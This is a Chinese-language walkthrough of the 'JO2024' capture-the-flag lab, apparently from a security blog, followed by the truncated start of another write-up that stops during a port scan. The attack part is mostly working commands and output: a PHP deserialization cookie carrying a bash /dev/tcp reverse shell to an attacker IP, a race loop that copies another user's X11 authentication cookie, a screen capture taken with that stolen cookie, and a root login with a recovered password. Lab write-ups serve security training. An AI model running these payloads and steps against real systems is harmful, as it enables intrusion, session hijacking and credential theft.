解码结果是：

O:15:"UserPreferences":2:{s:8:"language";s:2:"fr";s:15:"backgroundColor";s:4:"#ddd";}

这是什么？——PHP 序列化对象

这是一个 PHP serialize() 对象：

O:15:"UserPreferences":2:{...}

含义是：

UserPreferences 类
有 2 个属性：
- language = "fr"
- backgroundColor = "#ddd"

👉 100% 是 PHP 反序列化题目

O:15:"UserPreferences":2:{s:8:"language";s:2:"fr";s:15:"backgroundColor";s:19:"<?php phpinfo(); ?>";}
# ┌──(kalikali)-[~/temp/JO2024]
# └─$ echo -n "<?php phpinfo(); ?>" | wc -c
# 19
TzoxNToiVXNlclByZWZlcmVuY2VzIjoyOntzOjg6Imxhbmd1YWdlIjtzOjI6ImZyIjtzOjE1OiJiYWNrZ3JvdW5kQ29sb3IiO3M6MTk6Ijw/cGhwIHBocGluZm8oKTsgPz4iO30=

尝试了下失败了

转移命令执行的位置：

O:15:"UserPreferences":2:{s:8:"language";s:6:"whoami";s:15:"backgroundColor";s:4:"#ddd";}
# TzoxNToiVXNlclByZWZlcmVuY2VzIjoyOntzOjg6Imxhbmd1YWdlIjtzOjEwOiJmcmB3aG9hbWlgIjtzOjE1OiJiYWNrZ3JvdW5kQ29sb3IiO3M6NDoiI2RkZCI7fQ==

# ┌──(kalikali)-[~/temp/JO2024]
# └─$ echo -n "bash -c 'exec bash -i &>/dev/tcp/192.168.0.106/4444 <&1'" | wc -c
# 56
O:15:"UserPreferences":2:{s:8:"language";s:56:"bash -c 'exec bash -i &>/dev/tcp/192.168.0.106/4444 <&1'";s:15:"backgroundColor";s:4:"#ddd";}
TzoxNToiVXNlclByZWZlcmVuY2VzIjoyOntzOjg6Imxhbmd1YWdlIjtzOjU2OiJiYXNoIC1jICdleGVjIGJhc2ggLWkgJj4vZGV2L3RjcC8xOTIuMTY4LjAuMTA2LzQ0NDQgPCYxJyI7czoxNToiYmFja2dyb3VuZENvbG9yIjtzOjQ6IiNkZGQiO30%3D

┌──(web)─(root㉿kali)-[/home/kali]
└─# curl -v --cookie "preferences=TzoxNToiVXNlclByZWZlcmVuY2VzIjoyOntzOjg6Imxhbmd1YWdlIjtzOjU2OiJiYXNoIC1jICdleGVjIGJhc2ggLWkgJj4vZGV2L3RjcC8xOTIuMTY4LjAuMTA2LzQ0NDQgPCYxJyI7czoxNToiYmFja2dyb3VuZENvbG9yIjtzOjQ6IiNkZGQiO30%3D" http://192.168.0.105/preferences.php
*   Trying 192.168.0.105:80...
* Established connection to 192.168.0.105 (192.168.0.105 port 80) from 192.168.0.106 port 59122 
* using HTTP/1.x
> GET /preferences.php HTTP/1.1
> Host: 192.168.0.105
> User-Agent: curl/8.18.0-rc3
> Accept: */*
> Cookie: preferences=TzoxNToiVXNlclByZWZlcmVuY2VzIjoyOntzOjg6Imxhbmd1YWdlIjtzOjU2OiJiYXNoIC1jICdleGVjIGJhc2ggLWkgJj4vZGV2L3RjcC8xOTIuMTY4LjAuMTA2LzQ0NDQgPCYxJyI7czoxNToiYmFja2dyb3VuZENvbG9yIjtzOjQ6IiNkZGQiO30%3D
> 
* Request completely sent off

┌──(web)─(root㉿kali)-[/home/kali]
└─# pwncat-cs -lp 4444
/root/.pyenv/versions/3.11.9/envs/web/lib/python3.11/site-packages/zodburi/__init__.py:2: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  from pkg_resources import iter_entry_points
[00:06:15] Welcome to pwncat 🐈!                                                                    __main__.py:164
[00:26:17] received connection from 192.168.0.105:33400                                                  bind.py:84
[00:26:18] 192.168.0.105:33400: registered new host w/ db                                            manager.py:957
(local) pwncat$
Active Session: 192.168.0.105:33400

提权

(remote) www-data@jo2024.hmv:/var/www$ cat /etc/passwd | grep /bin
root:x:0:0:root:/root:/bin/bash
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
vanity:x:1000:1000:,,,:/home/vanity:/bin/bash
tss:x:103:111:TPM software stack,,,:/var/lib/tpm:/bin/false
lightdm:x:106:114:Light Display Manager:/var/lib/lightdm:/bin/false
(remote) www-data@jo2024.hmv:/home/vanity$ ls -la
total 76
drwxr-xr-x 10 vanity vanity 4096 Aug 21 09:30 .
drwxr-xr-x  3 root   root   4096 Jul 28 12:27 ..
-rw-------  1 vanity vanity  158 Aug 21 09:29 .Xauthority
lrwxrwxrwx  1 root   root      9 Jul 26 18:04 .bash_history -> /dev/null
-rw-r--r--  1 vanity vanity  220 Jul 29 13:48 .bash_logout
-rw-r--r--  1 vanity vanity 3526 Jul 29 13:48 .bashrc
drwxr-xr-x  7 vanity vanity 4096 Jul 29 13:48 .cache
drwx------ 13 vanity vanity 4096 Jul 29 15:47 .config
-rw-r--r--  1 vanity vanity   35 Jul 29 13:48 .dmrc
-rw-------  1 vanity vanity   36 Jul 29 13:48 .lesshst
drwxr-xr-x  3 vanity vanity 4096 Jul 29 13:48 .local
-rw-r--r--  1 vanity vanity  807 Jul 29 13:48 .profile
drwx------  2 vanity vanity 4096 Jul 29 14:40 .ssh
-rw-r--r--  1 vanity vanity    8 Jul 29 13:48 .xprofile
drwxr-xr-x  2 vanity vanity 4096 Jul 29 13:48 Desktop
drwxr-xr-x  2 vanity vanity 4096 Jul 29 13:48 Documents
drwxr-xr-x  2 vanity vanity 4096 Jul 29 13:48 Images
-rwxr-xr-x  1 vanity vanity  557 Jul 29 15:44 backup
drwx------  2 vanity vanity 4096 Jul 29 13:48 creds
-rwx------  1 vanity vanity   33 Jul 29 13:48 user.txt
(remote) www-data@jo2024.hmv:/home/vanity$ cat .dmrc
[Desktop]
Session=lightdm-xsession
(remote) www-data@jo2024.hmv:/home/vanity$ cat backup 
#!/bin/bash
 
SRC="/home/vanity"
DEST="/backup"
 
rm -rf /backup/{*,.*}
 
echo "Starting copy..."
find "$SRC" -maxdepth 1 -type f ! -name user.txt | while read srcfile; do
    destfile="$DEST${srcfile#$SRC}"
    mkdir -p "$(dirname "$destfile")"
    dd if="$srcfile" of="$destfile" bs=4M
 
    md5src=$(md5sum "$srcfile" | cut -d ' ' -f1)
    md5dest=$(md5sum "$destfile" | cut -d ' ' -f1)
    if [[ "$md5src" != "$md5dest" ]]; then
        echo "MD5 mismatch for $srcfile :("
    fi
    chmod 700 "$destfile"
 
done
 
echo "Copy complete. All files verified !"

运行频率：每分钟运行一次（从cron输出可见）
运行者：以用户 vanity (UID=1000) 运行
功能：将 /home/vanity 目录下的文件（除了 user.txt）复制到 /backup 目录
特点：
- 使用 dd 命令复制文件
- 每次运行会删除/backup 目录中的所有内容
- 复制后设置文件权限为 700（只有所有者可读写执行）

T0: cron 启动（vanity）
T1: rm -rf /backup/*
T2: find /home/vanity -type f
T3: dd if=/home/vanity/.Xauthority of=/backup/.Xauthority
T4: md5 校验
T5: chmod 700 /backup/.Xauthority
T6: 脚本结束

重点来了：

T3 到 T5 之间，是一个“短暂但真实存在”的窗口

操作系统视角：T3 到 T5 发生了什么？

我们只盯着 .Xauthority 这一份文件：

🔹 T3：`dd` 开始复制

此时发生的是：

/backup/.Xauthority被创建
文件内容开始写入
权限还没被改
默认权限 = 由 umask 决定

👉 在很多系统上，默认是：

-rw-r--r--  (644)

也就是说：

文件已经存在 & 可读，但还没 chmod

🔹 T4：md5sum 校验

这一步：

只是读文件
不改权限
延长了“窗口时间”

🔹 T5：chmod 700

这一步才真正把门关上。

⏱️ 结论一句话

在 T3 ~ T5 的这几毫秒 / 几十毫秒里，
**/backup/.Xauthority** 是“短暂对 www-data 可读的”

while true; do cat /backup/.Xauthority >> /tmp/log 2>/dev/null; sleep 0.01; done

(remote) www-data@jo2024.hmv:/tmp$ ./pspy64 
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done

2026/01/22 12:00:53 CMD: UID=33    PID=34731  | /usr/bin/bash                                                   
2026/01/22 12:00:53 CMD: UID=33    PID=34730  | sh -c /usr/bin/bash                                             
2026/01/22 12:00:53 CMD: UID=33    PID=34729  | /usr/bin/script -qc /usr/bin/bash /dev/null                     
2026/01/22 12:00:53 CMD: UID=33    PID=34710  | bash -i 
2026/01/22 12:00:53 CMD: UID=33    PID=34709  | sh -c bash -c 'exec bash -i &>/dev/tcp/192.168.0.106/4444 <&1'  
2026/01/22 12:00:53 CMD: UID=33    PID=4210   | /usr/bin/bash                                                   
2026/01/22 12:00:53 CMD: UID=33    PID=4209   | sh -c /usr/bin/bash                                             
2026/01/22 12:00:53 CMD: UID=33    PID=4208   | /usr/bin/script -qc /usr/bin/bash /dev/null                     
2026/01/22 12:00:53 CMD: UID=33    PID=4189   | bash -i 
2026/01/22 12:00:53 CMD: UID=33    PID=4188   | sh -c bash -c 'exec bash -i &>/dev/tcp/192.168.0.106/4444 <&1'  
2026/01/22 12:00:53 CMD: UID=33    PID=2399   | /usr/sbin/apache2 -k start                                                                           
2026/01/22 12:00:53 CMD: UID=1000  PID=994    | /usr/libexec/gvfsd-trash --spawner :1.5 /org/gtk/gvfs/exec_spaw/0                                                       
2026/01/22 12:00:53 CMD: UID=1000  PID=973    | /usr/libexec/gvfs-afc-volume-monitor                            
2026/01/22 12:00:53 CMD: UID=1000  PID=968    | /usr/libexec/gvfs-mtp-volume-monitor                            
2026/01/22 12:00:53 CMD: UID=1000  PID=964    | /usr/libexec/gvfs-goa-volume-monitor                            
2026/01/22 12:00:53 CMD: UID=1000  PID=960    | /usr/libexec/gvfs-gphoto2-volume-monitor                        
2026/01/22 12:00:53 CMD: UID=1000  PID=955    | /usr/libexec/gvfs-udisks2-volume-monitor                        
2026/01/22 12:00:53 CMD: UID=1000  PID=942    | /usr/bin/gnome-keyring-daemon --foreground --components=pkcs11,secrets --control-directory=/run/user/1000/keyring       
2026/01/22 12:00:53 CMD: UID=1000  PID=931    | /usr/bin/gnome-keyring-daemon --start --foreground --components=secrets                                                 
2026/01/22 12:00:53 CMD: UID=1000  PID=924    | /usr/libexec/at-spi2-registryd --use-gnome-session              
2026/01/22 12:00:53 CMD: UID=1000  PID=915    | /usr/libexec/xdg-desktop-portal-gtk                             
2026/01/22 12:00:53 CMD: UID=0     PID=912    | fusermount3 -o rw,nosuid,nodev,fsname=portal,auto_unmount,subtype=portal -- /run/user/1000/doc                          
2026/01/22 12:00:53 CMD: UID=1000  PID=902    | /usr/libexec/xdg-permission-store                               
2026/01/22 12:00:53 CMD: UID=1000  PID=899    | /usr/libexec/xdg-document-portal                                
2026/01/22 12:00:53 CMD: UID=1000  PID=890    | /usr/libexec/dconf-service                                      
2026/01/22 12:00:53 CMD: UID=1000  PID=889    | /usr/libexec/xdg-desktop-portal                                 
2026/01/22 12:00:53 CMD: UID=1000  PID=883    | /usr/lib/menu-cache/menu-cached /run/user/1000/menu-cached-:0   
2026/01/22 12:00:53 CMD: UID=1000  PID=854    | /usr/bin/dbus-daemon --config-file=/usr/share/defaults/at-spi2/accessibility.conf --nofork --print-address 11 --address=unix:path=/run/user/1000/at-spi/bus_0                   
2026/01/22 12:00:53 CMD: UID=1000  PID=841    | /usrlibexec/at-spi-bus-launcher --launch-immediately           
2026/01/22 12:00:53 CMD: UID=1000  PID=824    | /usr/bin/ssh-agent -s                                           
2026/01/22 12:00:53 CMD: UID=1000  PID=823    | xdg-user-dirs-gtk-update                                        
2026/01/22 12:00:53 CMD: UID=1000  PID=821    | /usr/bin/mousepad /home/vanity/creds/credentials.txt            
2026/01/22 12:00:53 CMD: UID=1000  PID=818    | parcellite                                                      
2026/01/22 12:00:53 CMD: UID=1000  PID=816    | xscreensaver-systemd                                            
2026/01/22 12:00:53 CMD: UID=1000  PID=807    | xscreensaver -no-splash                                         
2026/01/22 12:00:53 CMD: UID=1000  PID=806    | pcmanfm --desktop --profile LXDE                                
2026/01/22 12:00:53 CMD: UID=1000  PID=805    | lxpanel --profile LXDE                                          
2026/01/22 12:00:53 CMD: UID=1000  PID=801    | lxpolkit                                                        
2026/01/22 12:00:53 CMD: UID=1000  PID=795    | openbox --config-file /home/vanity/.config/openbox/lxde-rc.xml  
2026/01/22 12:00:53 CMD: UID=1000  PID=790    | /usr/libexec/gvfsd-fuse /run/user/1000/gvfs -f                  
2026/01/22 12:00:53 CMD: UID=1000  PID=785    | /usr/libexec/gvfsd                                              
2026/01/22 12:00:53 CMD: UID=1000  PID=770    | /usr/bin/ssh-agent x-session-manager                            
2026/01/22 12:00:53 CMD: UID=107   PID=722    | /usr/libexec/rtkit-daemon                                       
2026/01/22 12:00:53 CMD: UID=1000  PID=717    | /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only               
2026/01/22 12:00:53 CMD: UID=1000  PID=707    | /usr/bin/lxsession -s LXDE -e LXDE                              
2026/01/22 12:00:53 CMD: UID=1000  PID=705    | /usr/bin/pulseaudio --daemonize=no --log-target=journal         
2026/01/22 12:00:53 CMD: UID=1000  PID=664    | (sd-pam)                                                        
2026/01/22 12:00:53 CMD: UID=1000  PID=663    | /lib/systemd/systemd --user                                     
2026/01/22 12:00:53 CMD: UID=0     PID=654    | lightdm --session-child 15 18                                   
2026/01/22 12:00:53 CMD: UID=33    PID=643    | /usr/sbin/apache2 -k start                                                                           
2026/01/22 12:00:53 CMD: UID=0     PID=626    | /sbin/agetty -o -p -- \u --noclear - linux                      
2026/01/22 12:00:53 CMD: UID=0     PID=625    | /usr/lib/xorg/Xorg :0 -seat seat0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch                          
2026/01/22 12:00:53 CMD: UID=0     PID=606    | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups         
2026/01/22 12:00:53 CMD: UID=0     PID=581    | /usr/sbin/lightdm                                               
2026/01/22 12:00:53 CMD: UID=996   PID=571    | /usr/lib/polkit-1/polkitd --no-debug                            
2026/01/22 12:00:53 CMD: UID=0     PID=528    | /sbin/wpa_supplicant -u -s -O DIR=/run/wpa_supplicant GROUP=netdev                                                      
2026/01/22 12:00:53 CMD: UID=0     PID=525    | /usr/sbin/connmand -n                                           
2026/01/22 12:00:53 CMD: UID=0     PID=521    | /usr/libexec/udisks2/udisksd                                    
2026/01/22 12:00:53 CMD: UID=0     PID=518    | /lib/systemd/systemd-logind                                     
2026/01/22 12:00:53 CMD: UID=0     PID=517    | /usr/sbin/ofonod -n                                             
2026/01/22 12:00:53 CMD: UID=0     PID=514    | /usr/sbin/dundee -n                                             
2026/01/22 12:00:53 CMD: UID=100   PID=513    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only                
2026/01/22 12:00:53 CMD: UID=0     PID=512    | /usr/sbin/cron -f                                               
2026/01/22 12:00:53 CMD: UID=0     PID=439    | dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3                                     
2026/01/22 12:00:53 CMD: UID=997   PID=274    | /lib/systemd/systemd-timesyncd                                  
2026/01/22 12:00:53 CMD: UID=0     PID=265    | /lib/systemd/systemd-udevd                                      
2026/01/22 12:00:53 CMD: UID=0     PID=233    | /lib/systemd/systemd-journald                                   
2026/01/22 12:00:53 CMD: UID=0     PID=1      | /sbin/init splash                                               
2026/01/22 12:01:01 CMD: UID=0     PID=35519  | /usr/sbin/CRON -f                                               
2026/01/22 12:01:01 CMD: UID=0     PID=35518  | /usr/sbin/cron -f                                               
2026/01/22 12:01:01 CMD: UID=0     PID=35520  | /usr/sbin/CRON -f                                               
2026/01/22 12:01:01 CMD: UID=0     PID=35521  | /bin/sh -c /root/.local/error.sh                                
2026/01/22 12:01:01 CMD: UID=0     PID=35522  | /usr/sbin/CRON -f                                               
2026/01/22 12:01:01 CMD: UID=0     PID=35523  | /bin/bash /root/.local/error.sh                                 
2026/01/22 12:01:01 CMD: UID=1000  PID=35524  | /bin/sh -c /home/vanity/backup                                                                    
2026/01/22 12:01:02 CMD: UID=0     PID=35608  | 
2026/01/22 12:02:01 CMD: UID=0     PID=35610  | /usr/sbin/CRON -f                                               
2026/01/22 12:02:01 CMD: UID=0     PID=35609  | /usr/sbin/cron -f                                               
2026/01/22 12:02:01 CMD: UID=0     PID=35611  | /usr/sbin/CRON -f                                               
2026/01/22 12:02:01 CMD: UID=0     PID=35612  | /usr/sbin/CRON -f                                               
2026/01/22 12:02:01 CMD: UID=0     PID=35613  | /bin/sh -c /root/.local/error.sh                                
2026/01/22 12:02:01 CMD: UID=1000  PID=35614  | /bin/sh -c /home/vanity/backup                                  
2026/01/22 12:02:01 CMD: UID=0     PID=35615  | /bin/bash /root/.local/error.sh

6000 - Pentesting X11 - HackTricks

(remote) www-data@jo2024.hmv:/home/vanity/Images$ w                
 12:35:25 up  6:42,  1 user,  load average: 0.00, 0.00, 0.00                  
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT           
vanity   tty7     :0               05:53    6:42m  0.00s  0.03s /usr/bi

w 是一个用于显示当前登录用户及其正在执行的操作的系统监控命令。它提供的信息比简单的 who 命令更丰富，类似于一个实时、精简的用户活动仪表板。

tty7是什么？

tty = teletypewriter（终端设备）
tty1-tty6：通常是文本终端（Ctrl+Alt+F1到F6切换）
tty7：通常是图形界面终端（X服务器运行的地方）

在你的w命令输出中：

textvanity tty7 :0 04:34 4:19 0.00s 0.03s /usr/bin/lxsession -s LXDE -e LXDE
- 用户vanity在tty7上登录
- 运行着LXDE桌面环境
- :0 是X11显示编号

(remote) www-data@jo2024.hmv:/tmp$ ls -al /home/vanity/
total 76
drwxr-xr-x 10 vanity vanity 4096 Jan 23 04:35 .
drwxr-xr-x  3 root   root   4096 Jul 28  2024 ..
-rw-------  1 vanity vanity  158 Jan 23 04:34 .Xauthority
lrwxrwxrwx  1 root   root      9 Jul 26  2024 .bash_history -> /dev/null
-rw-r--r--  1 vanity vanity  220 Jul 29  2024 .bash_logout
-rw-r--r--  1 vanity vanity 3526 Jul 29  2024 .bashrc
drwxr-xr-x  7 vanity vanity 4096 Jul 29  2024 .cache
drwx------ 13 vanity vanity 4096 Jul 29  2024 .config
-rw-r--r--  1 vanity vanity   35 Jul 29  2024 .dmrc
-rw-------  1 vanity vanity   36 Jul 29  2024 .lesshst
drwxr-xr-x  3 vanity vanity 4096 Jul 29  2024 .local
-rw-r--r--  1 vanity vanity  807 Jul 29  2024 .profile
drwx------  2 vanity vanity 4096 Jul 29  2024 .ssh
-rw-r--r--  1 vanity vanity    8 Jul 29  2024 .xprofile
drwxr-xr-x  2 vanity vanity 4096 Jul 29  2024 Desktop
drwxr-xr-x  2 vanity vanity 4096 Jul 29  2024 Documents
drwxr-xr-x  2 vanity vanity 4096 Jul 29  2024 Images
-rwxr-xr-x  1 vanity vanity  557 Jul 29  2024 backup
drwx------  2 vanity vanity 4096 Jul 29  2024 creds
-rwx------  1 vanity vanity   33 Jul 29  2024 user.txt

一、`.Xauthority` 是什么？

**.Xauthority**** 是 X11 的“门禁卡盒子”**

谁拿到里面的 MIT-MAGIC-COOKIE，
谁就能“合法”连接 X Server，不管你是谁、不管你什么用户。

二、先理解 X11 的信任模型（这是根）

X11 是个非常老的系统，设计年代的假设是：

本机用户是可信的
本机不会跑恶意代码
多用户桌面 ≈ 不存在

所以它的核心逻辑是：

❌ 不做“用户隔离”
✅ 只做“是否被允许连接显示服务器”

这就引出了一个问题：

我凭什么相信你能连我这个显示器？

答案就是：Cookie

三、`.Xauthority` 文件本质上是什么？

.Xauthority 不是配置文件，它是：

二进制数据库
存的是：

显示名 + 认证方式 + 密钥

你用 xxd 看到的这些：

MIT-MAGIC-COOKIE-1

不是字符串装饰，而是 认证协议名称。

结构可以抽象成：

[ display :0 ] -> [ MIT-MAGIC-COOKIE-1 ] -> [ 128-bit 随机密钥 ]

四、MIT-MAGIC-COOKIE-1 到底“魔法”在哪？

它的机制非常简单，也非常致命：

X Server 启动时生成一个随机 cookie
cookie 被写进 .Xauthority
客户端连接 X Server 时：
- “我是谁” ❌
- “我是不是 root” ❌
- “你给我 cookie 吗” ✅

如果 cookie 匹配：

X Server：你进来吧

没有第二道验证。

五、`.Xauthority` 放在哪？为什么会被偷？

通常路径是：

/home/vanity/.Xauthority

但在现实中，经常会出现：

X 程序以 root 启动
DISPLAY 被 export 给别的用户
Web 服务继承了环境变量
文件权限配置错误
临时 copy 到 /tmp
备份目录可读（你这个就是）

你拿到的 log 文件，本质上就是：

vanity 的 **.Xauthority** 副本

(remote) www-data@jo2024.hmv:/home/vanity$ cat /tmp/log debian11MIT-MAGIC-COOKIE-1�>7�
�EXJ[���f�debian0MIT-MAGIC-COOKIE-1������m�lJ���

jo2024.hmv0MIT-MAGIC-COOKIE-1�J�@�s��wA�6[7��

上传busybox

(remote) www-data@jo2024.hmv:/tmp$ wget http://192.168.10.105:8888/busybox
(remote) www-data@jo2024.hmv:/tmp$ chmod +x busybox 
(remote) www-data@jo2024.hmv:/tmp$ ./busybox xxd log
00000000: 0100 0006 6465 6269 616e 0002 3131 0012  ....debian..11..
00000010: 4d49 542d 4d41 4749 432d 434f 4f4b 4945  MIT-MAGIC-COOKIE
00000020: 2d31 0010 e23e 37c8 0ab2 4558 4a5b f010  -1...>7...EXJ[..
00000030: c6d3 6685 0100 0006 6465 6269 616e 0001  ..f.....debian..
00000040: 3000 124d 4954 2d4d 4147 4943 2d43 4f4f  0..MIT-MAGIC-COO
00000050: 4b49 452d 3100 10f9 9d8e bcf0 f56d 8f00  KIE-1........m..
00000060: 036c 4aac edb2 0c01 0000 0a6a 6f32 3032  .lJ........jo202
00000070: 342e 686d 7600 0130 0012 4d49 542d 4d41  4.hmv..0..MIT-MA
00000080: 4749 432d 434f 4f4b 4945 2d31 0010 a4d5  GIC-COOKIE-1....
00000090: 7190 b1f2 25fe f8e4 28c8 959e b4f2 0100  q...%...(.......
000000a0: 0006 6465 6269 616e 0002 3131 0012 4d49  ..debian..11..MI
000000b0: 542d 4d41 4749 432d 434f 4f4b 4945 2d31  T-MAGIC-COOKIE-1
000000c0: 0010 e23e 37c8 0ab2 4558 4a5b f010 c6d3  ...>7...EXJ[....
000000d0: 6685 0100 0006 6465 6269 616e 0001 3000  f.....debian..0.
000000e0: 124d 4954 2d4d 4147 4943 2d43 4f4f 4b49  .MIT-MAGIC-COOKI
000000f0: 452d 3100 10f9 9d8e bcf0 f56d 8f00 036c  E-1........m...l
00000100: 4aac edb2 0c01 0000 0a6a 6f32 3032 342e  J........jo2024.
00000110: 686d 7600 0130 0012 4d49 542d 4d41 4749  hmv..0..MIT-MAGI
00000120: 432d 434f 4f4b 4945 2d31 0010 a4d5 7190  C-COOKIE-1....q.
00000130: b1f2 25fe f8e4 28c8 959e b4f2            ..%...(.....
(remote) www-data@jo2024.hmv:/tmp$ xauth -f log     
Using authority file log
xauth> list
debian/unix:11  MIT-MAGIC-COOKIE-1  e23e37c80ab245584a5bf010c6d36685
debian/unix:0  MIT-MAGIC-COOKIE-1  f99d8ebcf0f56d8f00036c4aacedb20c
jo2024.hmv/unix:0  MIT-MAGIC-COOKIE-1  a4d57190b1f225fef8e428c8959eb4f2
debian/unix:11  MIT-MAGIC-COOKIE-1  e23e37c80ab245584a5bf010c6d36685
debian/unix:0  MIT-MAGIC-COOKIE-1  f99d8ebcf0f56d8f00036c4aacedb20c
jo2024.hmv/unix:0  MIT-MAGIC-COOKIE-1  a4d57190b1f225fef8e428c8959eb4f2
xauth> 
(remote) www-data@jo2024.hmv:/tmp$ export XAUTHORITY=/tmp/log            
(remote) www-data@jo2024.hmv:/tmp$ xwd -root -screen -silent -display :0 > screenshot.xwd
(remote) www-data@jo2024.hmv:/tmp$ python3 -m http.server 8888
# kali
┌──(kali💀kali)-[~/temp/JO2024]
└─$ wget http://192.168.10.101:8888/screenshot.xwd                                                                                                                                     
┌──(kali💀kali)-[~/temp/JO2024]
└─$ convert screenshot.xwd screenshot.png

提权-root

vanity@jo2024:~$ sudo -l
Matching Defaults entries for vanity on jo2024:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User vanity may run the following commands on jo2024:
    (ALL : ALL) NOPASSWD: /usr/local/bin/php-server.sh
vanity@jo2024:~$ cat /usr/local/bin/php-server.sh
#!/bin/bash

/usr/bin/php -t /opt -S 0.0.0.0:8000
vanity@jo2024:~$ sudo /usr/local/bin/php-server.sh&
[1] 449123
vanity@jo2024:~$ ss -tnlup
Netid              State               Recv-Q              Send-Q                           Local Address:Port                           Peer Address:Port              Process              
udp                UNCONN              0                   0                                 127.0.0.1%lo:53                                  0.0.0.0:*                                      
udp                UNCONN              0                   0                                     [::1]%lo:53                                     [::]:*                                      
tcp                LISTEN              0                   128                                    0.0.0.0:22                                  0.0.0.0:*                                      
tcp                LISTEN              0                   4096                                   0.0.0.0:8000                                0.0.0.0:*                                      
tcp                LISTEN              0                   10                                127.0.0.1%lo:53                                  0.0.0.0:*                                      
tcp                LISTEN              0                   511                                          *:80                                        *:*                                      
tcp                LISTEN              0                   128                                       [::]:22                                     [::]:*                                      
tcp                LISTEN              0                   10                                    [::1]%lo:53                                     [::]:*

打开源码能看见：

const csrfToken =
  "0b8c28722248d54790eb611700a9c76afbdada117ee57f7bb3b7ce72c84f10c7";

document.addEventListener("DOMContentLoaded", function () {
  fetch("get_protected_content.php", {
    method: "POST",
    headers: {
      "Content-Type": "application/json",
    },
    body: JSON.stringify({ token: csrfToken }),
  })
    .then((response) => response.json())
    .then((data) => {
      if (data.content) {
        document
          .getElementById("protected-content")
          .setAttribute("data-content", data.content);
      } else {
        console.error("Failed to load content:", data);
      }
    })
    .catch((error) => console.error("Error fetching content:", error));
});

function showOverlay() {
  document.getElementById("overlay").classList.add("show-overlay");
}

function hideOverlay() {
  document.getElementById("overlay").classList.remove("show-overlay");
}

window.activateFeature = function () {
  var contentDiv = document.getElementById("protected-content");
  var protectedContent = contentDiv.getAttribute("data-content");
  if (protectedContent) {
    contentDiv.innerHTML = protectedContent;
    contentDiv.style.background = "none";
    contentDiv.style.color = "#333";
    contentDiv.classList.remove("blurred");
    hideOverlay();
  } else {
    console.error("No content available");
  }
};

document.addEventListener("keydown", function (event) {
  if (event.key === "Escape") {
    hideOverlay();
  }
});

F12可以看到隐藏的内容，得到信息

LightningBolt123

利用登录root

root@jo2024:/home/vanity# cat user.txt 
e2cb9d6e0899cde91130ca4b37139021

root@jo2024:~# cat root.txt 
cbd60dab37bc85e1f7ea4b5c9c4eed90

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hmvmachines/jo2024/

MazeSec-Guoqing

呼啸山庄 — Wed, 21 Jan 2026 00:00:00 GMT

信息收集

rustscan扫描

┌──(web)─(root㉿kali)-[/home/kali]
└─# rustscan -a 192.168.0.101 -- -A
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.0.101:22
Open 192.168.0.101:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.0.101
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-17 05:27 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 05:27
Completed NSE at 05:27, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 05:27
Completed NSE at 05:27, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 05:27
Completed NSE at 05:27, 0.00s elapsed
Initiating ARP Ping Scan at 05:27
Scanning 192.168.0.101 [1 port]
Completed ARP Ping Scan at 05:27, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:27
Completed Parallel DNS resolution of 1 host. at 05:27, 0.03s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
